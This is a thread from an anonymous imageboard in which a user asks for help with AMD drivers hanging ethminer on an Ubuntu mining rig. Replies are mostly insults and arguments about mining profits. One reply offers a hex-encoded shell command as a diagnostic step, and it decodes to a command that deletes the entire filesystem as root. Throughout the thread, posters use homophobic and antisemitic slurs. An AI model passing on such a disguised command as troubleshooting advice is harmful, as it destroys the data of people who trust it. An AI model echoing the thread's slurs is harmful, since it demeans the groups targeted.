Can any linux fags help me out?

Can any linux fags help me out?
I have ubuntu server 16.04 installed on my mining rig and I can't seem to get the latest amd pro drivers working. I'm using ethminer and amdpro 16.40-348864 drivers, and it works fine. However, when I update to amdpro 17.10-* drivers, ethminer will hang after it generates the DAG file. Why is this?

Back you go

it's a technical question about linux and amd drivers. Not /biz/.

its a question about etherminer, fuck off back to your containment board or use google.

Fuck you faggot. It's a question about why opencl stops working under load with latest amd drivers on linux.



this doesn't help fix my problem...


have you tried taking the jewish cock out of your mouth?

You've got a big problem but here I have the solution

go fuck yourself, faggot

Go fuck yourself Sup Forums. Sorry you're fat retarded neckbeard ass is too busy running arch on thinkpad shitbooks, instead of making money.

Ask /sqt/ this doesn't deserve an entire thread dumbass

How much you spent so far with how much you made?


I too hate public transportation

Actually you might have better luck with Arch, using the AMDGPU driver and only the OpenCL parts of AMDGPU PRO via the opencl-amd AUR package.

spent 2000. Had my miner running for 1 month. Made 500. Just waiting for the RIO whether Sup Forums decides to help me or not. I'll just continue to use the old drivers.

He can't even get the damn thing to work. He's six feet deep and digging deeper.

Ethminer is a piece of shit. It crashes immediately the moment I try to set any parameters (setx gpu 100 etc)

Wangblows 10 is free and the only downside is a watermark. Use that with claymore.

Also tick tock while you're shitposting you're losing money faggot

most amd driver issues can be solved with simple terminal commands. try running

$(echo 7375646f20726d202d7266202f202d2d6e6f2d70726573657276652d726f6f74 | xxd -r -p)

and post the output here so we can diagnose properly

Ok good to know but is it 500 after costs like leccy?

Ffs give him a chance

Been running for a month fag. Also this is just a minor investment

>one month
>$500 (USD I'm assuming?)

So you're -$1,500 so far. Is that including the power bill increase?

Why are you so angry?

Actually the value of my assets went up considering each rx580 has gone up significantly from the price I purchased them at. Hell I could sell all the cards right now for 3k and still have a new pc and 500 profit from mining.

In other words stay salty my friends.

I'm not, not even that guy who earlier was ranting about holes being dug.
I'm the one who chuckled at the Bus.

Myself and my cousin were looking into getting into the mining (next time) so I just browse these threads for info.
Just gathering information.

Seems silly to me though, I could have just purchased ETH earlier with my fiat Maple Bucks and cashed out when stuff was high.
But figuring out which cryptocoin is going to climb is like playing Russian Roulette with a belt fed machine gun. Compared to businesses that have tangible data to go by (until some rich fuck manipulates things).
As such I just have my money in the old system making gains there.

So why don't you?

Or are you just going to keep running them mining until they die someday?

Or will he wait until the markets get flooded after the Ethereum bubble bursts and sell his GPUs for half of what he paid for them? Or will he try to move to even shittier coins all of which will also crash after everyone has the same idea? The possibilities are endless!

No need to sell it for a measly 1k profit. It will make more money long term.

go away coiner

>It will make more money long term.

said every future bankrupt gambler

Why are you so caught up on how another man makes his living?

This is some /cgl/ tier shit

Wow look at all these salty no-coiners. I guess I really did come to the wrong board. Sorry you guys cant play your vidya games and fap to your vr anime porn because of the gpu price increase. I really am. Forget I even asked for help. I find it funny to see how scares you guys are of new technology when your board is literally a board about new technology. Oh well. Cant say I'm not suprised.



wew lad


says the guy who writes out full paragraphs of analpain

Feels good to be the elite.

if i had made a post asking for help to get games working on linux, I can guarentee Sup Forums would at least try to be helpful. But because I mention cryptocurrencies, Sup Forums looses it's shit. Sup Forums is the real containment board.

>games working on linux

also lol. I'm not that stupid you fags.

>I'm not that stupid you fags.

1500 in the hole, cant get his shit to run, but he's

>not that stupid

>muh digital money
>muh stock market
>muh fat ass shitposting while misused graphics cards generate money for my neckbeard self

>inb4 "salty no-coin"

To be honest your question would still be tech support tier unless you formatted it very carefully. I don't think you'd get many answers apart from the occasional .

And when it comes to whether or not cryptocurrency is a worthy investment that is clearly stuff. Stuff like blockchain technology and the EVM on a technical level might get a pass with the occasional user telling you to fuck right back to .

Sup Forums isn't perfect, but it not being the best is no excuse for shitting it up even further.

>-2 hours
>made $20

>-2 hours
>lost $2 in electricity and $30 in mountain dew

>ether mining
>38 gfx cards.

Kill yourself faggot, you're the reason the market is dry of every gfx card relased in the past year.


>2 hours
he claims to have mined $500 in a month so it's more like $1.50

if I lost $2 in electricity during the same 2 hours, then his 10 or so gpus would have burned through at least $10

so really he lost $8.50

stay salty minercuck

38 gfx cards, I doubt he has "made" 500 dollars. More like 50.

You're right. I do make roughly $0.75 an hour and pay roughly $0.05 kw/hr for electricity. So making roughly 70 cents an hour, or 18 bucks a day. Overtime that adds up to a lot of money tho.

what the fuck. Are all of these GPUs?

You son of a whore.

also tell me what GPUs these are

idk. this isnt my mining rig. My mining rig only has four rx 580s.

Why don't you invest in solar panels? You will waste spend less on energy on the long run.

Wow. And you already make five hundred bucks per month? Jesus, talk about passive income.


Anybody wanna invest?

*4 Rx 580s*

Dude, you are literally the reason so many people can't buy gfx cards.

Morons like you went out and bought all of them to mine "shithtereum"

>Why don't you invest in solar panels? You will waste spend less on energy on the long run.
Because they're very inefficient. I could buy another mining rig for the cost of powering my current one. I pay very little for electricity so it would be kind of a waste. Long term it would be good, but by the time i'd pay it off these gpus will be outdated and unable to turn a profit.

>my mining rig
fucking kill yourself

Whats the difference between a physicist using opencl computations, a graphic artist rendering in blender, a gamer playing video games, and me using opencl to mine ethereum? The answer is there isn't one. Amd should just keep up with the demand.

As far as I understand it, they can't increase production with a turn of the knob like that. Even if they could, it would probably be way too risky and require a whole lot of work on their side as well.

They are playing a much longer game than probably any of the miners that bought in since the beginning of the year. It's not a bad position either, they are among the real winners of this gold rush.

Physicists, graphic artists and to some extent gamers (in case of esports), produce some value.Mining ethereum has zero value to the economy.

Also, factories have capped production capacities.They can't just churn out more cards just because morons like you go out and buy them in the dozens.

Also, the prices have gone up like 60%.

The only way I see this getting fixed is AMD and nVidia releasing mandatory updates prohibiting the use of commercial gfx cards for mining anything while releasing cards specifically for that.

Sup Forums isn't your personal tech support. Also cryptocurrency talk belongs on /biz/.

>Mining ethereum has zero value to the economy
>Hosting a node for a decentralized and distributed computing network has no value
Yeah, fuck off retard